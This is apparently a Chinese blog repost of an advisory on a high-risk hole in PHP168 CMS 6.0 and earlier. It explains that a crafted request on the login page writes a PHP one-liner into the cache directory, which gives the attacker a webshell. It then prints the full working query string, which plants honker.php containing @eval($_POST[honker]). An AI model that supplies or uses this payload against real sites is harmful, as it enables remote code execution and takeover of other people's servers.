`
love~ruby+rails
  • 浏览: 830974 次
  • 性别: Icon_minigender_1
  • 来自: lanzhou
社区版块
存档分类
最新评论

PHP168 6.0及以下版本漏洞

PHPCache 
阅读更多
PHP168 6.0及以下版本漏洞
# 鬼仔:未测试。最近比较忙,所以很多东西都更新不及时,也有好多没贴上来,抱歉,这几天整理下,把积攒的都更新了。

来源:chinesehonker

危险等级:高

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。


测试语句:
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?
分享到:
| 浅析如何控制内网机器
评论
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

Magicbox
Global site tag (gtag.js) - Google Analytics